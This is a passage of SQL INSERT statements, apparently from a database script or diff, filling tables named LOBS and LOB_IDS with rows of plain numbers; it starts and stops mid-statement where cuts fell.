VALUES(579,1,0,579) +INSERT INTO LOBS VALUES(580,1,0,580) +INSERT INTO LOBS VALUES(581,1,0,581) +INSERT INTO LOBS VALUES(582,1,0,582) +INSERT INTO LOBS VALUES(583,1,0,583) +INSERT INTO LOBS VALUES(584,1,0,584) +INSERT INTO LOBS VALUES(585,1,0,585) +INSERT INTO LOBS VALUES(586,1,0,586) +INSERT INTO LOBS VALUES(587,1,0,587) +INSERT INTO LOBS VALUES(588,1,0,588) +INSERT INTO LOBS VALUES(589,1,0,589) +INSERT INTO LOBS VALUES(590,1,0,590) +INSERT INTO LOBS VALUES(591,1,0,591) +INSERT INTO LOBS VALUES(592,1,0,592) +INSERT INTO LOBS VALUES(593,1,0,593) +INSERT INTO LOBS VALUES(594,1,0,594) +INSERT INTO LOBS VALUES(595,1,0,595) +INSERT INTO LOBS VALUES(596,1,0,596) +INSERT INTO LOBS VALUES(597,1,0,597) +INSERT INTO LOBS VALUES(598,1,0,598) +INSERT INTO LOBS VALUES(599,1,0,599) +INSERT INTO LOBS VALUES(600,1,0,600) +INSERT INTO LOBS VALUES(601,1,0,601) +INSERT INTO LOBS VALUES(602,1,0,602) +INSERT INTO LOBS VALUES(603,1,0,603) +INSERT INTO LOBS VALUES(604,1,0,604) +INSERT INTO LOBS VALUES(605,1,0,605) +INSERT INTO LOBS VALUES(606,1,0,606) +INSERT INTO LOBS VALUES(607,1,0,607) +INSERT INTO LOBS VALUES(608,1,0,608) +INSERT INTO LOBS VALUES(609,1,0,609) +INSERT INTO LOBS VALUES(610,1,0,610) +INSERT INTO LOBS VALUES(611,1,0,611) +INSERT INTO LOBS VALUES(612,1,0,612) +INSERT INTO LOBS VALUES(613,1,0,613) +INSERT INTO LOBS VALUES(614,1,0,614) +INSERT INTO LOBS VALUES(615,1,0,615) +INSERT INTO LOBS VALUES(616,1,0,616) +INSERT INTO LOBS VALUES(617,1,0,617) +INSERT INTO LOBS VALUES(618,1,0,618) +INSERT INTO LOBS VALUES(619,1,0,619) +INSERT INTO LOBS VALUES(620,1,0,620) +INSERT INTO LOBS VALUES(621,1,0,621) +INSERT INTO LOBS VALUES(622,1,0,622) +INSERT INTO LOBS VALUES(623,1,0,623) +INSERT INTO LOBS VALUES(624,1,0,624) +INSERT INTO LOBS VALUES(625,1,0,625) +INSERT INTO LOBS VALUES(626,1,0,626) +INSERT INTO LOBS VALUES(627,1,0,627) +INSERT INTO LOBS VALUES(628,1,0,628) +INSERT INTO LOBS VALUES(629,1,0,629) +INSERT INTO LOBS VALUES(630,1,0,630) +INSERT INTO LOBS VALUES(631,1,0,631) +INSERT INTO LOBS VALUES(632,1,0,632) +INSERT INTO LOBS VALUES(633,1,0,633) +INSERT INTO LOBS VALUES(634,1,0,634) +INSERT INTO LOBS VALUES(635,1,0,635) +INSERT INTO LOBS VALUES(636,1,0,636) +INSERT INTO LOBS VALUES(637,1,0,637) +INSERT INTO LOBS VALUES(638,1,0,638) +INSERT INTO LOBS VALUES(639,1,0,639) +INSERT INTO LOBS VALUES(640,1,0,640) +INSERT INTO LOBS VALUES(641,1,0,641) +INSERT INTO LOBS VALUES(642,1,0,642) +INSERT INTO LOBS VALUES(643,1,0,643) +INSERT INTO LOBS VALUES(644,1,0,644) +INSERT INTO LOBS VALUES(645,1,0,645) +INSERT INTO LOBS VALUES(646,1,0,646) +INSERT INTO LOBS VALUES(647,1,0,647) +INSERT INTO LOBS VALUES(648,1,0,648) +INSERT INTO LOBS VALUES(649,1,0,649) +INSERT INTO LOBS VALUES(650,1,0,650) +INSERT INTO LOBS VALUES(651,1,0,651) +INSERT INTO LOBS VALUES(652,1,0,652) +INSERT INTO LOBS VALUES(653,1,0,653) +INSERT INTO LOBS VALUES(654,1,0,654) +INSERT INTO LOBS VALUES(655,1,0,655) +INSERT INTO LOBS VALUES(656,1,0,656) +INSERT INTO LOBS VALUES(657,1,0,657) +INSERT INTO LOBS VALUES(658,1,0,658) +INSERT INTO LOBS VALUES(659,1,0,659) +INSERT INTO LOBS VALUES(660,1,0,660) +INSERT INTO LOBS VALUES(661,1,0,661) +INSERT INTO LOBS VALUES(662,1,0,662) +INSERT INTO LOBS VALUES(663,1,0,663) +INSERT INTO LOBS VALUES(664,1,0,664) +INSERT INTO LOBS VALUES(665,1,0,665) +INSERT INTO LOBS VALUES(666,1,0,666) +INSERT INTO LOBS VALUES(667,1,0,667) +INSERT INTO LOBS VALUES(668,1,0,668) +INSERT INTO LOBS VALUES(669,1,0,669) +INSERT INTO LOBS VALUES(670,1,0,670) +INSERT INTO LOBS VALUES(671,1,0,671) +INSERT INTO LOBS VALUES(672,1,0,672) +INSERT INTO LOBS VALUES(673,1,0,673) +INSERT INTO LOBS VALUES(674,1,0,674) +INSERT INTO LOBS VALUES(675,1,0,675) +INSERT INTO LOBS VALUES(676,1,0,676) +INSERT INTO LOBS VALUES(677,1,0,677) +INSERT INTO LOBS VALUES(678,1,0,678) +INSERT INTO LOBS VALUES(679,1,0,679) +INSERT INTO LOBS VALUES(680,1,0,680) +INSERT INTO LOBS VALUES(681,1,0,681) +INSERT INTO LOBS VALUES(682,1,0,682) +INSERT INTO LOBS VALUES(683,1,0,683) +INSERT INTO LOBS VALUES(684,1,0,684) +INSERT INTO LOBS VALUES(685,1,0,685) +INSERT INTO LOBS VALUES(686,1,0,686) +INSERT INTO LOBS VALUES(687,1,0,687) +INSERT INTO LOBS VALUES(688,1,0,688) +INSERT INTO LOBS VALUES(689,1,0,689) +INSERT INTO LOBS VALUES(690,1,0,690) +INSERT INTO LOBS VALUES(691,1,0,691) +INSERT INTO LOBS VALUES(692,1,0,692) +INSERT INTO LOBS VALUES(693,1,0,693) +INSERT INTO LOBS VALUES(694,1,0,694) +INSERT INTO LOBS VALUES(695,1,0,695) +INSERT INTO LOBS VALUES(696,1,0,696) +INSERT INTO LOBS VALUES(697,1,0,697) +INSERT INTO LOBS VALUES(698,1,0,698) +INSERT INTO LOBS VALUES(699,1,0,699) +INSERT INTO LOBS VALUES(700,1,0,700) +INSERT INTO LOBS VALUES(701,1,0,701) +INSERT INTO LOBS VALUES(702,1,0,702) +INSERT INTO LOBS VALUES(703,1,0,703) +INSERT INTO LOBS VALUES(704,1,0,704) +INSERT INTO LOBS VALUES(705,1,0,705) +INSERT INTO LOBS VALUES(706,1,0,706) +INSERT INTO LOBS VALUES(707,1,0,707) +INSERT INTO LOBS VALUES(708,1,0,708) +INSERT INTO LOBS VALUES(709,1,0,709) +INSERT INTO LOBS VALUES(710,1,0,710) +INSERT INTO LOBS VALUES(711,1,0,711) +INSERT INTO LOBS VALUES(712,1,0,712) +INSERT INTO LOBS VALUES(713,1,0,713) +INSERT INTO LOBS VALUES(714,1,0,714) +INSERT INTO LOBS VALUES(715,1,0,715) +INSERT INTO LOBS VALUES(716,1,0,716) +INSERT INTO LOBS VALUES(717,1,0,717) +INSERT INTO LOBS VALUES(718,1,0,718) +INSERT INTO LOBS VALUES(719,1,0,719) +INSERT INTO LOBS VALUES(720,1,0,720) +INSERT INTO LOBS VALUES(721,1,0,721) +INSERT INTO LOBS VALUES(722,1,0,722) +INSERT INTO LOBS VALUES(723,1,0,723) +INSERT INTO LOBS VALUES(724,1,0,724) +INSERT INTO LOBS VALUES(725,1,0,725) +INSERT INTO LOBS VALUES(726,1,0,726) +INSERT INTO LOBS VALUES(727,1,0,727) +INSERT INTO LOBS VALUES(728,1,0,728) +INSERT INTO LOBS VALUES(729,1,0,729) +INSERT INTO LOBS VALUES(730,1,0,730) +INSERT INTO LOBS VALUES(731,1,0,731) +INSERT INTO LOBS VALUES(732,1,0,732) +INSERT INTO LOBS VALUES(733,1,0,733) +INSERT INTO LOBS VALUES(734,1,0,734) +INSERT INTO LOBS VALUES(735,1,0,735) +INSERT INTO LOBS VALUES(736,1,0,736) +INSERT INTO LOBS VALUES(737,1,0,737) +INSERT INTO LOBS VALUES(738,1,0,738) +INSERT INTO LOBS VALUES(739,1,0,739) +INSERT INTO LOBS VALUES(740,1,0,740) +INSERT INTO LOBS VALUES(741,1,0,741) +INSERT INTO LOBS VALUES(742,1,0,742) +INSERT INTO LOBS VALUES(743,1,0,743) +INSERT INTO LOBS VALUES(744,1,0,744) +INSERT INTO LOBS VALUES(745,1,0,745) +INSERT INTO LOBS VALUES(746,1,0,746) +INSERT INTO LOBS VALUES(747,1,0,747) +INSERT INTO LOBS VALUES(748,1,0,748) +INSERT INTO LOBS VALUES(749,1,0,749) +INSERT INTO LOBS VALUES(750,1,0,750) +INSERT INTO LOBS VALUES(751,1,0,751) +INSERT INTO LOBS VALUES(752,1,0,752) +INSERT INTO LOBS VALUES(753,1,0,753) +INSERT INTO LOBS VALUES(754,1,0,754) +INSERT INTO LOBS VALUES(755,1,0,755) +INSERT INTO LOBS VALUES(756,1,0,756) +INSERT INTO LOBS VALUES(757,1,0,757) +INSERT INTO LOBS VALUES(758,1,0,758) +INSERT INTO LOBS VALUES(759,1,0,759) +INSERT INTO LOBS VALUES(760,1,0,760) +INSERT INTO LOBS VALUES(761,1,0,761) +INSERT INTO LOBS VALUES(762,1,0,762) +INSERT INTO LOBS VALUES(763,1,0,763) +INSERT INTO LOBS VALUES(764,1,0,764) +INSERT INTO LOBS VALUES(765,1,0,765) +INSERT INTO LOBS VALUES(766,1,0,766) +INSERT INTO LOBS VALUES(767,1,0,767) +INSERT INTO LOBS VALUES(768,1,0,768) +INSERT INTO LOBS VALUES(769,1,0,769) +INSERT INTO LOBS VALUES(770,1,0,770) +INSERT INTO LOBS VALUES(771,1,0,771) +INSERT INTO LOBS VALUES(772,1,0,772) +INSERT INTO LOBS VALUES(773,1,0,773) +INSERT INTO LOBS VALUES(774,1,0,774) +INSERT INTO LOBS VALUES(775,1,0,775) +INSERT INTO LOBS VALUES(776,1,0,776) +INSERT INTO LOBS VALUES(777,1,0,777) +INSERT INTO LOBS VALUES(778,1,0,778) +INSERT INTO LOBS VALUES(779,1,0,779) +INSERT INTO LOBS VALUES(780,1,0,780) +INSERT INTO LOBS VALUES(781,1,0,781) +INSERT INTO LOBS VALUES(782,1,0,782) +INSERT INTO LOBS VALUES(783,1,0,783) +INSERT INTO LOBS VALUES(784,1,0,784) +INSERT INTO LOBS VALUES(785,1,0,785) +INSERT INTO LOBS VALUES(786,1,0,786) +INSERT INTO LOBS VALUES(787,1,0,787) +INSERT INTO LOBS VALUES(788,1,0,788) +INSERT INTO LOBS VALUES(789,1,0,789) +INSERT INTO LOBS VALUES(790,1,0,790) +INSERT INTO LOBS VALUES(791,1,0,791) +INSERT INTO LOBS VALUES(792,1,0,792) +INSERT INTO LOBS VALUES(793,1,0,793) +INSERT INTO LOBS VALUES(794,1,0,794) +INSERT INTO LOBS VALUES(795,1,0,795) +INSERT INTO LOBS VALUES(796,1,0,796) +INSERT INTO LOBS VALUES(797,1,0,797) +INSERT INTO LOBS VALUES(798,1,0,798) +INSERT INTO LOBS VALUES(799,1,0,799) +INSERT INTO LOBS VALUES(800,1,0,800) +INSERT INTO LOBS VALUES(801,1,0,801) +INSERT INTO LOBS VALUES(802,1,0,802) +INSERT INTO LOBS VALUES(803,1,0,803) +INSERT INTO LOBS VALUES(804,1,0,804) +INSERT INTO LOBS VALUES(805,1,0,805) +INSERT INTO LOBS VALUES(806,1,0,806) +INSERT INTO LOBS VALUES(807,1,0,807) +INSERT INTO LOBS VALUES(808,1,0,808) +INSERT INTO LOBS VALUES(809,1,0,809) +INSERT INTO LOBS VALUES(810,1,0,810) +INSERT INTO LOBS VALUES(811,1,0,811) +INSERT INTO LOBS VALUES(812,1,0,812) +INSERT INTO LOBS VALUES(813,1,0,813) +INSERT INTO LOBS VALUES(814,1,0,814) +INSERT INTO LOBS VALUES(815,1,0,815) +INSERT INTO LOBS VALUES(816,1,0,816) +INSERT INTO LOBS VALUES(817,1,0,817) +INSERT INTO LOBS VALUES(818,1,0,818) +INSERT INTO LOBS VALUES(819,1,0,819) +INSERT INTO LOBS VALUES(820,5,0,820) +INSERT INTO LOBS VALUES(825,1,0,821) +INSERT INTO LOBS VALUES(826,1,0,822) +INSERT INTO LOBS VALUES(827,1,0,823) +INSERT INTO LOBS VALUES(828,1,0,824) +INSERT INTO LOBS VALUES(829,1,0,825) +INSERT INTO LOBS VALUES(830,1,0,826) +INSERT INTO LOBS VALUES(831,1,0,827) +INSERT INTO LOBS VALUES(832,1,0,828) +INSERT INTO LOBS VALUES(833,1,0,829) +INSERT INTO LOBS VALUES(834,1,0,830) +INSERT INTO LOBS VALUES(835,1,0,831) +INSERT INTO LOBS VALUES(836,1,0,832) +INSERT INTO LOBS VALUES(837,1,0,833) +INSERT INTO LOBS VALUES(838,1,0,834) +INSERT INTO LOBS VALUES(839,1,0,835) +INSERT INTO LOBS VALUES(840,1,0,836) +INSERT INTO LOBS VALUES(841,1,0,837) +INSERT INTO LOBS VALUES(842,1,0,838) +INSERT INTO LOBS VALUES(843,1,0,839) +INSERT INTO LOBS VALUES(844,1,0,840) +INSERT INTO LOBS VALUES(845,1,0,841) +INSERT INTO LOBS VALUES(846,1,0,842) +INSERT INTO LOBS VALUES(847,1,0,843) +INSERT INTO LOBS VALUES(848,1,0,844) +INSERT INTO LOBS VALUES(849,1,0,845) +INSERT INTO LOBS VALUES(850,1,0,846) +INSERT INTO LOBS VALUES(851,1,0,847) +INSERT INTO LOBS VALUES(852,1,0,848) +INSERT INTO LOBS VALUES(853,1,0,849) +INSERT INTO LOBS VALUES(854,1,0,850) +INSERT INTO LOBS VALUES(855,1,0,851) +INSERT INTO LOBS VALUES(856,1,0,852) +INSERT INTO LOBS VALUES(857,1,0,853) +INSERT INTO LOBS VALUES(858,1,0,854) +INSERT INTO LOBS VALUES(859,1,0,855) +INSERT INTO LOBS VALUES(860,1,0,856) +INSERT INTO LOBS VALUES(861,1,0,857) +INSERT INTO LOBS VALUES(862,1,0,858) +INSERT INTO LOBS VALUES(863,1,0,859) +INSERT INTO LOBS VALUES(864,1,0,860) +INSERT INTO LOBS VALUES(865,1,0,861) +INSERT INTO LOBS VALUES(866,1,0,862) +INSERT INTO LOBS VALUES(867,1,0,863) +INSERT INTO LOBS VALUES(868,1,0,864) +INSERT INTO LOBS VALUES(869,1,0,865) +INSERT INTO LOBS VALUES(870,1,0,866) +INSERT INTO LOBS VALUES(871,1,0,867) +INSERT INTO LOBS VALUES(872,1,0,868) +INSERT INTO LOBS VALUES(873,1,0,869) +INSERT INTO LOBS VALUES(874,1,0,870) +INSERT INTO LOBS VALUES(875,1,0,871) +INSERT INTO LOBS VALUES(876,1,0,872) +INSERT INTO LOBS VALUES(877,1,0,873) +INSERT INTO LOBS VALUES(878,1,0,874) +INSERT INTO LOBS VALUES(879,1,0,875) +INSERT INTO LOBS VALUES(880,1,0,876) +INSERT INTO LOBS VALUES(881,1,0,877) +INSERT INTO LOBS VALUES(882,1,0,878) +INSERT INTO LOBS VALUES(883,1,0,879) +INSERT INTO LOBS VALUES(884,1,0,880) +INSERT INTO LOBS VALUES(885,1,0,881) +INSERT INTO LOBS VALUES(886,1,0,882) +INSERT INTO LOBS VALUES(887,1,0,883) +INSERT INTO LOBS VALUES(888,1,0,884) +INSERT INTO LOBS VALUES(889,1,0,885) +INSERT INTO LOBS VALUES(890,1,0,886) +INSERT INTO LOBS VALUES(891,1,0,887) +INSERT INTO LOBS VALUES(892,1,0,888) +INSERT INTO LOBS VALUES(893,1,0,889) +INSERT INTO LOBS VALUES(894,1,0,890) +INSERT INTO LOBS VALUES(895,1,0,891) +INSERT INTO LOBS VALUES(896,1,0,892) +INSERT INTO LOBS VALUES(897,1,0,893) +INSERT INTO LOBS VALUES(898,1,0,894) +INSERT INTO LOBS VALUES(899,1,0,895) +INSERT INTO LOBS VALUES(900,1,0,896) +INSERT INTO LOBS VALUES(901,1,0,897) +INSERT INTO LOBS VALUES(902,1,0,898) +INSERT INTO LOBS VALUES(903,1,0,899) +INSERT INTO LOBS VALUES(904,1,0,900) +INSERT INTO LOBS VALUES(905,1,0,901) +INSERT INTO LOBS VALUES(906,1,0,902) +INSERT INTO LOBS VALUES(907,1,0,903) +INSERT INTO LOBS VALUES(908,1,0,904) +INSERT INTO LOBS VALUES(909,1,0,905) +INSERT INTO LOBS VALUES(910,1,0,906) +INSERT INTO LOBS VALUES(911,1,0,907) +INSERT INTO LOBS VALUES(912,1,0,908) +INSERT INTO LOBS VALUES(913,1,0,909) +INSERT INTO LOBS VALUES(914,1,0,910) +INSERT INTO LOBS VALUES(915,1,0,911) +INSERT INTO LOBS VALUES(916,1,0,912) +INSERT INTO LOBS VALUES(917,1,0,913) +INSERT INTO LOBS VALUES(918,1,0,914) +INSERT INTO LOBS VALUES(919,1,0,915) +INSERT INTO LOBS VALUES(920,1,0,916) +INSERT INTO LOBS VALUES(921,1,0,917) +INSERT INTO LOBS VALUES(922,1,0,918) +INSERT INTO LOBS VALUES(923,1,0,919) +INSERT INTO LOBS VALUES(924,1,0,920) +INSERT INTO LOBS VALUES(925,1,0,921) +INSERT INTO LOBS VALUES(926,1,0,922) +INSERT INTO LOBS VALUES(927,1,0,923) +INSERT INTO LOBS VALUES(928,1,0,924) +INSERT INTO LOBS VALUES(929,1,0,925) +INSERT INTO LOBS VALUES(930,1,0,926) +INSERT INTO LOBS VALUES(931,1,0,927) +INSERT INTO LOBS VALUES(932,1,0,928) +INSERT INTO LOBS VALUES(933,1,0,929) +INSERT INTO LOBS VALUES(934,1,0,930) +INSERT INTO LOBS VALUES(935,1,0,931) +INSERT INTO LOBS VALUES(936,1,0,932) +INSERT INTO LOBS VALUES(937,1,0,933) +INSERT INTO LOBS VALUES(938,1,0,934) +INSERT INTO LOBS VALUES(939,1,0,935) +INSERT INTO LOBS VALUES(940,1,0,936) +INSERT INTO LOBS VALUES(941,1,0,937) +INSERT INTO LOBS VALUES(942,1,0,938) +INSERT INTO LOBS VALUES(943,1,0,939) +INSERT INTO LOBS VALUES(944,1,0,940) +INSERT INTO LOBS VALUES(945,1,0,941) +INSERT INTO LOBS VALUES(946,1,0,942) +INSERT INTO LOBS VALUES(947,1,0,943) +INSERT INTO LOBS VALUES(948,1,0,944) +INSERT INTO LOBS VALUES(949,1,0,945) +INSERT INTO LOBS VALUES(950,1,0,946) +INSERT INTO LOBS VALUES(951,1,0,947) +INSERT INTO LOBS VALUES(952,1,0,948) +INSERT INTO LOBS VALUES(953,1,0,949) +INSERT INTO LOBS VALUES(954,1,0,950) +INSERT INTO LOBS VALUES(955,1,0,951) +INSERT INTO LOBS VALUES(956,1,0,952) +INSERT INTO LOBS VALUES(957,1,0,953) +INSERT INTO LOBS VALUES(958,1,0,954) +INSERT INTO LOBS VALUES(959,1,0,955) +INSERT INTO LOBS VALUES(960,1,0,956) +INSERT INTO LOBS VALUES(961,1,0,957) +INSERT INTO LOBS VALUES(962,1,0,958) +INSERT INTO LOBS VALUES(963,1,0,959) +INSERT INTO LOBS VALUES(964,1,0,960) +INSERT INTO LOBS VALUES(965,1,0,961) +INSERT INTO LOBS VALUES(966,1,0,962) +INSERT INTO LOBS VALUES(967,1,0,963) +INSERT INTO LOBS VALUES(968,1,0,964) +INSERT INTO LOBS VALUES(969,1,0,965) +INSERT INTO LOBS VALUES(970,1,0,966) +INSERT INTO LOBS VALUES(971,1,0,967) +INSERT INTO LOBS VALUES(972,1,0,968) +INSERT INTO LOBS VALUES(973,1,0,969) +INSERT INTO LOBS VALUES(974,1,0,970) +INSERT INTO LOBS VALUES(975,1,0,971) +INSERT INTO LOBS VALUES(976,1,0,972) +INSERT INTO LOBS VALUES(977,1,0,973) +INSERT INTO LOBS VALUES(978,1,0,974) +INSERT INTO LOBS VALUES(979,1,0,975) +INSERT INTO LOBS VALUES(980,1,0,976) +INSERT INTO LOBS VALUES(981,1,0,977) +INSERT INTO LOBS VALUES(982,1,0,978) +INSERT INTO LOBS VALUES(983,1,0,979) +INSERT INTO LOBS VALUES(984,1,0,980) +INSERT INTO LOBS VALUES(985,1,0,981) +INSERT INTO LOBS VALUES(986,1,0,982) +INSERT INTO LOBS VALUES(987,1,0,983) +INSERT INTO LOBS VALUES(988,1,0,984) +INSERT INTO LOBS VALUES(989,1,0,985) +INSERT INTO LOBS VALUES(990,1,0,986) +INSERT INTO LOBS VALUES(991,1,0,987) +INSERT INTO LOBS VALUES(992,1,0,988) +INSERT INTO LOBS VALUES(993,1,0,989) +INSERT INTO LOBS VALUES(994,1,0,990) +INSERT INTO LOBS VALUES(995,1,0,991) +INSERT INTO LOBS VALUES(996,1,0,992) +INSERT INTO LOBS VALUES(997,1,0,993) +INSERT INTO LOBS VALUES(998,1,0,994) +INSERT INTO LOBS VALUES(999,1,0,995) +INSERT INTO LOBS VALUES(1000,1,0,996) +INSERT INTO LOBS VALUES(1001,1,0,997) +INSERT INTO LOBS VALUES(1002,1,0,998) +INSERT INTO LOBS VALUES(1003,1,0,999) +INSERT INTO LOBS VALUES(1004,1,0,1000) +INSERT INTO LOBS VALUES(1005,1,0,1001) +INSERT INTO LOBS VALUES(1006,1,0,1004) +INSERT INTO LOBS VALUES(1007,1,0,1005) +INSERT INTO LOBS VALUES(1008,1,0,1006) +INSERT INTO LOBS VALUES(1009,1,0,1007) +INSERT INTO LOBS VALUES(1010,1,0,1008) +INSERT INTO LOBS VALUES(1011,1,0,1009) +INSERT INTO LOBS VALUES(1012,1,0,1010) +INSERT INTO LOBS VALUES(1013,1,0,1011) +INSERT INTO LOBS VALUES(1014,1,0,1014) +INSERT INTO LOBS VALUES(1015,1,0,1015) +INSERT INTO LOBS VALUES(1016,1,0,1016) +INSERT INTO LOBS VALUES(1017,1,0,1017) +INSERT INTO LOBS VALUES(1018,1,0,1018) +INSERT INTO LOBS VALUES(1019,1,0,1021) +INSERT INTO LOB_IDS VALUES(1,61,1,40) +INSERT INTO LOB_IDS VALUES(2,77,1,40) +INSERT INTO LOB_IDS VALUES(3,49,1,40) +INSERT INTO LOB_IDS VALUES(4,120,1,40) +INSERT INTO LOB_IDS VALUES(5,117,1,40) +INSERT INTO LOB_IDS VALUES(6,112,1,40) +INSERT INTO LOB_IDS VALUES(7,108,1,40) +INSERT INTO LOB_IDS VALUES(8,118,1,40) +INSERT INTO LOB_IDS VALUES(9,110,1,40) +INSERT INTO LOB_IDS VALUES(10,130,1,40) +INSERT INTO LOB_IDS VALUES(11,114,1,40) +INSERT INTO LOB_IDS VALUES(12,106,1,40) +INSERT INTO LOB_IDS VALUES(13,201,1,40) +INSERT INTO LOB_IDS VALUES(14,960,1,40) +INSERT INTO LOB_IDS VALUES(15,176,1,40) +INSERT INTO LOB_IDS VALUES(16,1653,1,40) +INSERT INTO LOB_IDS VALUES(17,322,1,40) +INSERT INTO LOB_IDS VALUES(18,551,1,40) +INSERT INTO LOB_IDS VALUES(19,572,1,40) +INSERT INTO LOB_IDS VALUES(20,323,1,40) +INSERT INTO LOB_IDS VALUES(21,552,1,40) +INSERT INTO LOB_IDS VALUES(22,573,1,40) +INSERT INTO LOB_IDS VALUES(23,324,1,40) +INSERT INTO LOB_IDS VALUES(24,552,1,40) +INSERT INTO LOB_IDS VALUES(25,323,1,40) +INSERT INTO LOB_IDS VALUES(26,552,1,40) +INSERT INTO LOB_IDS VALUES(27,573,1,40) +INSERT INTO LOB_IDS VALUES(28,323,1,40) +INSERT INTO LOB_IDS VALUES(29,552,1,40) +INSERT INTO LOB_IDS VALUES(30,573,1,40) +INSERT INTO LOB_IDS VALUES(31,323,1,40) +INSERT INTO LOB_IDS VALUES(32,552,1,40) +INSERT INTO LOB_IDS VALUES(33,573,1,40) +INSERT INTO LOB_IDS VALUES(34,64,1,40) +INSERT INTO LOB_IDS VALUES(35,324,1,40) +INSERT INTO LOB_IDS VALUES(36,322,1,40) +INSERT INTO LOB_IDS VALUES(37,552,1,40) +INSERT INTO LOB_IDS VALUES(38,552,1,40) +INSERT INTO LOB_IDS VALUES(39,573,1,40) +INSERT INTO LOB_IDS VALUES(40,323,1,40) +INSERT INTO LOB_IDS VALUES(41,552,1,40) +INSERT INTO LOB_IDS VALUES(42,573,1,40) +INSERT INTO LOB_IDS VALUES(43,323,1,40) +INSERT INTO LOB_IDS VALUES(44,552,1,40) +INSERT INTO LOB_IDS VALUES(45,573,1,40) +INSERT INTO LOB_IDS VALUES(46,323,1,40) +INSERT INTO LOB_IDS VALUES(47,322,1,40) +INSERT INTO LOB_IDS VALUES(48,552,1,40) +INSERT INTO LOB_IDS VALUES(49,552,1,40) +INSERT INTO LOB_IDS VALUES(50,573,1,40) +INSERT INTO LOB_IDS VALUES(51,323,1,40) +INSERT INTO LOB_IDS VALUES(52,552,1,40) +INSERT INTO LOB_IDS VALUES(53,573,1,40) +INSERT INTO LOB_IDS VALUES(54,64,1,40) +INSERT INTO LOB_IDS VALUES(55,323,1,40) +INSERT INTO LOB_IDS VALUES(56,552,1,40) +INSERT INTO LOB_IDS VALUES(57,573,1,40) +INSERT INTO LOB_IDS VALUES(58,324,1,40) +INSERT INTO LOB_IDS VALUES(59,322,1,40) +INSERT INTO LOB_IDS VALUES(60,552,1,40) +INSERT INTO LOB_IDS VALUES(61,552,1,40) +INSERT INTO LOB_IDS VALUES(62,573,1,40) +INSERT INTO LOB_IDS VALUES(63,323,1,40) +INSERT INTO LOB_IDS VALUES(64,552,1,40) +INSERT INTO LOB_IDS VALUES(65,573,1,40) +INSERT INTO LOB_IDS VALUES(66,323,1,40) +INSERT INTO LOB_IDS VALUES(67,552,1,40) +INSERT INTO LOB_IDS VALUES(68,573,1,40) +INSERT INTO LOB_IDS VALUES(69,64,1,40) +INSERT INTO LOB_IDS VALUES(70,64,1,40) +INSERT INTO LOB_IDS VALUES(71,64,1,40) +INSERT INTO LOB_IDS VALUES(72,64,1,40) +INSERT INTO LOB_IDS VALUES(73,64,1,40) +INSERT INTO LOB_IDS VALUES(74,64,1,40) +INSERT INTO LOB_IDS VALUES(75,64,1,40) +INSERT INTO LOB_IDS VALUES(76,64,1,40) +INSERT INTO LOB_IDS VALUES(77,64,1,40) +INSERT INTO LOB_IDS VALUES(78,64,1,40) +INSERT INTO LOB_IDS VALUES(79,64,1,40) +INSERT INTO LOB_IDS VALUES(80,64,1,40) +INSERT INTO LOB_IDS VALUES(81,64,1,40) +INSERT INTO LOB_IDS VALUES(82,64,1,40) +INSERT INTO LOB_IDS VALUES(83,64,1,40) +INSERT INTO LOB_IDS VALUES(84,630,1,40) +INSERT INTO LOB_IDS VALUES(85,635,1,40) +INSERT INTO LOB_IDS VALUES(86,625,1,40) +INSERT INTO LOB_IDS VALUES(87,612,1,40) +INSERT INTO LOB_IDS VALUES(88,652,1,40) +INSERT INTO LOB_IDS VALUES(89,618,1,40) +INSERT INTO LOB_IDS VALUES(90,639,1,40) +INSERT INTO LOB_IDS VALUES(91,64,1,40) +INSERT INTO LOB_IDS VALUES(92,64,1,40) +INSERT INTO LOB_IDS VALUES(93,64,1,40) +INSERT INTO LOB_IDS VALUES(94,64,1,40) +INSERT INTO LOB_IDS VALUES(95,64,1,40) +INSERT INTO LOB_IDS VALUES(96,354,1,40) +INSERT INTO LOB_IDS VALUES(97,339,1,40) +INSERT INTO LOB_IDS VALUES(98,625,1,40) +INSERT INTO LOB_IDS VALUES(99,622,1,40) +INSERT INTO LOB_IDS VALUES(100,588,1,40) +INSERT INTO LOB_IDS VALUES(101,652,1,40) +INSERT INTO LOB_IDS VALUES(102,618,1,40) +INSERT INTO LOB_IDS VALUES(103,609,1,40) +INSERT INTO LOB_IDS VALUES(104,201,1,40) +INSERT INTO LOB_IDS VALUES(105,2013,1,40) +INSERT INTO LOB_IDS VALUES(106,176,1,40) +INSERT INTO LOB_IDS VALUES(107,2662,1,40) +INSERT INTO LOB_IDS VALUES(108,64,1,40) +INSERT INTO LOB_IDS VALUES(109,64,1,40) +INSERT INTO LOB_IDS VALUES(110,64,1,40) +INSERT INTO LOB_IDS VALUES(111,64,1,40) +INSERT INTO LOB_IDS VALUES(112,4,1,40) +INSERT INTO LOB_IDS VALUES(113,197,1,40) +INSERT INTO LOB_IDS VALUES(114,61,1,40) +INSERT INTO LOB_IDS VALUES(115,77,1,40) +INSERT INTO LOB_IDS VALUES(116,49,1,40) +INSERT INTO LOB_IDS VALUES(117,120,1,40) +INSERT INTO LOB_IDS VALUES(118,117,1,40) +INSERT INTO LOB_IDS VALUES(119,112,1,40) +INSERT INTO LOB_IDS VALUES(120,108,1,40) +INSERT INTO LOB_IDS VALUES(121,118,1,40) +INSERT INTO LOB_IDS VALUES(122,110,1,40) +INSERT INTO LOB_IDS VALUES(123,159,1,40) +INSERT INTO LOB_IDS VALUES(124,526,1,40) +INSERT INTO LOB_IDS VALUES(125,213,1,40) +INSERT INTO LOB_IDS VALUES(126,130,1,40) +INSERT INTO LOB_IDS VALUES(127,114,1,40) +INSERT INTO LOB_IDS VALUES(128,106,1,40) +INSERT INTO LOB_IDS VALUES(129,461,1,40) +INSERT INTO LOB_IDS VALUES(130,519,1,40) +INSERT INTO LOB_IDS VALUES(131,621,1,40) +INSERT INTO LOB_IDS VALUES(132,523,1,40) +INSERT INTO LOB_IDS VALUES(133,519,1,40) +INSERT INTO LOB_IDS VALUES(134,522,1,40) +INSERT INTO LOB_IDS VALUES(135,567,1,40) +INSERT INTO LOB_IDS VALUES(136,49,1,40) +INSERT INTO LOB_IDS VALUES(137,354,1,40) +INSERT INTO LOB_IDS VALUES(138,523,1,40) +INSERT INTO LOB_IDS VALUES(139,523,1,40) +INSERT INTO LOB_IDS VALUES(140,522,1,40) +INSERT INTO LOB_IDS VALUES(141,621,1,40) +INSERT INTO LOB_IDS VALUES(142,527,1,40) +INSERT INTO LOB_IDS VALUES(143,522,1,40) +INSERT INTO LOB_IDS VALUES(144,503,1,40) +INSERT INTO LOB_IDS 